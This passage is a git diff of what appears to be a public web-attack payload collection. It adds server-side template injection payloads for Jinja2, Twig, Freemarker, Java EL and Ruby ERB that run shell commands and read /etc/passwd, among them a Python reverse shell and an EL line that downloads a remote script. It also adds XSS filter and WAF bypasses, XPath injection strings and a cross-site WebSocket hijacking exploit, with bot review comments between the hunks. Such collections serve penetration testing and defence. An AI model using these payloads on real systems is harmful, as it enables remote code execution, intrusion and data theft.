{% endfor %} +{{'a'.toUpperCase()}} +{{ request }} +{{self}} +<%= File.open('/etc/passwd').read %> +<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} +[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} +${"freemarker.template.utility.Execute"?new()("id")} +{{app.request.query.filter(0,0,1024,{'options':'system'})}} +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} +{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} +{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} +{{config.__class__.__init__.__globals__['os'].popen('ls').read()}} +{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} +{$smarty.version} +{php}echo `id`;{/php} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} +{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} +{{request|attr(["_"*2,"class","_"*2]|join)}} +{{request|attr(["__","class","__"]|join)}} +{{request|attr("__class__")}} +{{request.__class__}} +{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; 
x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} +{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} +${T(java.lang.System).getenv()} +${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 79c2a9f..2f88b82 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -14,9 +14,13 @@ * [Basic injection](#basic-injection) * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables) * [Retrieve /etc/passwd](#retrieve--etc-passwd) +* [Expression Language EL](#expression-language-el) + * [Basic injection](#basic-injection) + * [Code execution](#code-execution) * [Twig](#twig) * [Basic injection](#basic-injection) * [Template format](#template-format) + * [Arbitrary File Reading](#arbitrary-file-reading) * [Code execution](#code-execution) * [Smarty](#smarty) * [Freemarker](#freemarker) @@ -40,6 +44,9 @@ * [Jinjava](#jinjava) * [Basic injection](#basic-injection) * [Command execution](#command-execution) +* [ASP.NET Razor](#aspnet-razor) + * [Basic injection](#basic-injection) + * [Command execution](#command-execution) * [References](#references) ## Tools @@ -87,6 +94,17 @@ Slim: ### Code execution +Execute code using SSTI for ERB engine. + +```ruby +<%= system('cat /etc/passwd') %> +<%= `ls /` %> +<%= IO.popen('ls /').readlines() %> +<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> +``` + + Execute code using SSTI for Slim engine. ```powershell 
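Review bot: in the new `Intruder/ssti.fuzz` wordlist, the Jinja entry `{% for key, value in config.iteritems() %} ... {% endfor %}` and the Jinjava `ProcessBuilder ... netstat` entry appear to span several lines in this view; if they really are multi-line in the file, a per-line Intruder run sends them as separate fragments, so join each into one line. The file also starts with an empty line (an empty request), and `config.iteritems()` is Python 2 only while `config.items()` is already present. In the README TOC hunk, the new `Expression Language EL` sub-entries reuse `#basic-injection` and `#code-execution`, so they jump to the first section with those headings; GitHub de-duplicates repeated headings as `#basic-injection-1`, `#basic-injection-2` and so on, and the ASP.NET Razor entries added below have the same problem. The double blank line after the ERB block can go.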
@@ -119,6 +137,47 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} ``` +## Expression Language EL + +### Basic injection + +```java +${1+1} +#{1+1} +``` + +### Code Execution + + +```java +// Common RCE payloads +''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec() +''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance().start() + +// Method using Runtime +#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])} +#{session.getAttribute("rtc").setAccessible(true)} +#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")} + +// Method using processbuilder +${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())} +${request.getAttribute("c").add("cmd.exe")} +${request.getAttribute("c").add("/k")} +${request.getAttribute("c").add("ping x.x.x.x")} +${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} +${request.getAttribute("a")} + +// Method using Reflection & Invoke 
+${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")} + +// Method using ScriptEngineManager one-liner +${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))} + +// Method using ScriptEngineManager +${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} +``` + + ## Twig ### Basic injection @@ -126,6 +185,8 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex ```python {{7*7}} {{7*'7'}} would result in 49 +{{dump(app)}} +{{app.request.server.all|join(',')}} ``` ### Template format @@ -142,12 +203,28 @@ $output = $twig > render ( ); ``` +### Arbitrary File Reading + +```python +"{{'/etc/passwd'|file_excerpt(1,30)}}"@ +``` + ### Code execution ```python {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} +``` + +Example with an email passing FILTER_VALIDATE_EMAIL PHP. + +```powershell +POST /subscribe?0=cat+/etc/passwd HTTP/1.1 +email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld ``` ## Smarty 
@@ -368,6 +445,11 @@ Bypassing `|join` http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ ``` +Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus: +```python +{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} +``` + ## Jinjava ### Basic injection @@ -394,6 +476,21 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` +## ASP.NET Razor + +### Basic injection + +```powershell +@(1+2) +``` + +### Command execution + +```csharp +@{ + // C# code +} +``` ## References 
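Review bot: the `### Command execution` section for ASP.NET Razor is a placeholder (`@{ // C# code }`) that shows no command execution at all; the Clément Notin reference added in this patch is where the content should come from, so either add a concrete Razor statement block or leave the section out until there is one, rather than shipping an empty template. Also `@(1+2)` is fenced as `powershell` while the next block is `csharp`; both are Razor and should share a tag. The Jinja2 `Bypassing most common filters` line runs straight into its fence; a blank line keeps it consistent with the rest of the file.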
@@ -410,3 +507,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) * [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) +* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) +* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) +* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) +* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) \ No newline at end of file diff --git a/Type Juggling/README.md b/Type Juggling/README.md index c51c805..7e97f99 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md 
@@ -42,9 +42,13 @@ var_dump(md5([])); # NULL If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. -| Hash | “Magic” Number / String | Magic Hash | Found By | +| Hash | “Magic” Number / String | Magic Hash | Found By / Description | | ---- | -------------------------- |:---------------------------------------------:| -------------:| | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | | SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | | SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | | SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) | diff --git a/Upload Insecure Files/Configuration IIS web.config/web.web.config b/Upload Insecure Files/Configuration IIS web.config/web.web.config new file mode 100644 index 0000000..6e02a37 --- /dev/null +++ b/Upload Insecure Files/Configuration IIS web.config/web.web.config @@ -0,0 +1,65 @@ + + + + + + + + + + + + + + + + + + + diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 6229f86..1ffa55c 100644 --- a/Upload Insecure Files/README.md 
+++ b/Upload Insecure Files/README.md @@ -65,6 +65,9 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm * `Content-Type : image/gif` * `Content-Type : image/png` * `Content-Type : image/jpeg` +- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) + + Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. ### Picture upload with LFI @@ -95,4 +98,4 @@ Touch command * [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/) * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) -* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) \ No newline at end of file +* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) diff --git a/Web Sockets/README.md b/Web Sockets/README.md index b53a7b7..c63bdd4 100644 --- a/Web Sockets/README.md +++ b/Web Sockets/README.md 
@@ -31,9 +31,36 @@ Then you can use any tools against the newly created web service, working as a p sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump ``` +## Cross-Site WebSocket Hijacking (CSWSH) + +If the WebSocket handshake is not correctly protected using a CSRF token or a +nonce, it's possible to use the authenticated WebSocket of a user on an +attacker's controlled site because the cookies are automatically sent by the +browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH). + +Example exploit, hosted on an attacker's server, that exfiltrates the received +data from the WebSocket to the attacker: + +```html + +``` + +You have to adjust the code to your exact situation. E.g. if your web +application uses a `Sec-WebSocket-Protocol` header in the handshake request, +you have to add this value as a 2nd parameter to the `WebSocket` function call +in order to add this header. ## References - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) -- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) \ No newline at end of file +- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index bcbe72e..6e0ac6d 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -28,6 +28,9 @@ x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 +search=')] | //user/*[contains(*,' +search=Har') and contains(../password,'c +search=Har') and starts-with(../password,'c ``` ## Blind Exploitation 
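Review bot: the new Type Juggling table row for `129581926211651571912466741651878684928` does not belong in this table: its MD5 `06da5430449f8f6f23dfc1276f722738` does not start with `0e`, so the float-comparison rule stated just above the table does not apply; the `Raw: ?T0D??o#??'or'8.N=?` column shows it is the raw-binary `md5($x, true)` SQL injection trick (the digest bytes contain `'or'8`), which is a different bug and deserves its own short paragraph instead of a row under a header renamed to `Found By / Description`. In the Upload README hunk the new `- [Magic Bytes]` item uses `-` while the surrounding list uses `*`; match the existing marker. In the Web Sockets text, `on an attacker's controlled site` should read `on an attacker-controlled site`, and `2nd parameter to the WebSocket function call` is the second argument of the `WebSocket` constructor (its `protocols` parameter), which is what sets `Sec-WebSocket-Protocol`.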
diff --git a/XSS Injection/Files/mouseover-xss-ecs.jpeg b/XSS Injection/Files/mouseover-xss-ecs.jpeg new file mode 100644 index 0000000..0f7053a Binary files /dev/null and b/XSS Injection/Files/mouseover-xss-ecs.jpeg differ diff --git a/XSS Injection/Files/onclick-xss-ecs.jpeg b/XSS Injection/Files/onclick-xss-ecs.jpeg new file mode 100644 index 0000000..ccd2d0f Binary files /dev/null and b/XSS Injection/Files/onclick-xss-ecs.jpeg differ diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg b/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg new file mode 100644 index 0000000..ad73a45 Binary files /dev/null and b/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg differ diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.png b/XSS Injection/Files/payload_in_all_known_exif_corrupted.png new file mode 100644 index 0000000..17b6266 Binary files /dev/null and b/XSS Injection/Files/payload_in_all_known_exif_corrupted.png differ diff --git a/XSS Injection/Files/payload_in_all_known_metadata.jpg b/XSS Injection/Files/payload_in_all_known_metadata.jpg new file mode 100644 index 0000000..43d7b6a Binary files /dev/null and b/XSS Injection/Files/payload_in_all_known_metadata.jpg differ diff --git a/XSS Injection/Files/payload_in_all_known_metadata.png b/XSS Injection/Files/payload_in_all_known_metadata.png new file mode 100644 index 0000000..fdd55e3 Binary files /dev/null and b/XSS Injection/Files/payload_in_all_known_metadata.png differ diff --git a/XSS Injection/Files/payload_text_xss.png b/XSS Injection/Files/payload_text_xss.png new file mode 100644 index 0000000..45e17d5 Binary files /dev/null and b/XSS Injection/Files/payload_text_xss.png differ diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 1fe1978..9cdfe91 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
@@ -39,6 +39,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) - [Bypass ">" using nothing](#bypass----using-nothing) + - [Bypass "<" using <](#bypass----using-<) - [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using Katana](#bypass-using-katana) @@ -52,6 +53,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass using UTF-32](#bypass-using-utf---32) - [Bypass using BOM](#bypass-using-bom) - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation) + - [Bypass using jsfuck](#bypass-using-jsfuck) - [CSP Bypass](#csp-bypass) - [Common WAF Bypass](#common-waf-bypass) @@ -143,6 +145,7 @@ Svg payload "> ">(`Firefox` is the only browser which allows self closing script) Div payload
MOVE HERE
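Review bot: the new TOC entry `[Bypass "<" using <](#bypass----using-<)` has a literal `<` in its fragment; GitHub drops such characters when it generates heading ids, so the link will not resolve. The entry text also reads `using <` on both sides, which suggests a different character (an HTML entity or a Unicode look-alike) was meant on one side, as in the `Bypass < with <` reference added at the bottom of this file; write the entry so the distinguishing character is visible and give the fragment without the `<`.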
@@ -775,6 +778,12 @@ You don't need to close your tags. .͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕ +``` + ### Bypass ";" using another character ```javascript 
@@ -926,9 +935,17 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o ``` +### Bypass using jsfuck + +Bypass using [jsfuck](http://www.jsfuck.com/) + +```javascript +[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() +``` + ## CSP Bypass -Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://appio.dev/vulns/google-csp-evaluator/) +Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) 
@@ -975,7 +992,27 @@ Works for CSP like `script-src 'self' data:` ## Common WAF Bypass -### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019 +### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec) + +#### 21st april 2020 + +```html + +``` + +#### 22nd august 2019 + +```html + +``` + +#### 3rd june 2019 ```html @@ -1041,6 +1078,11 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld ``` +### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019 + +```javascript +\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e +``` ## References @@ -1108,3 +1150,5 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) +- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) +- [Bypass < with <](https://hackerone.com/reports/639684) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b12c8c7..2c3623c 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
@@ -511,22 +511,22 @@ updating: xl/sharedStrings.xml (deflated 17%) ## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) -* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) -* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) -* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) +* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka +* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) +* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) * [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) * [XXE ALL THE THINGS!!! 
(including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) -* [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html) * [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/) -* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify -* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht -* [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) -* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) -* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) -* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) +* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify +* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht +* [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals +* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017 +* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) -* [Exploiting XXE with local DTD files - 
Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) +* [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) -- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) -- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) +* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau +* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) +* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon +* [SynAcktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports 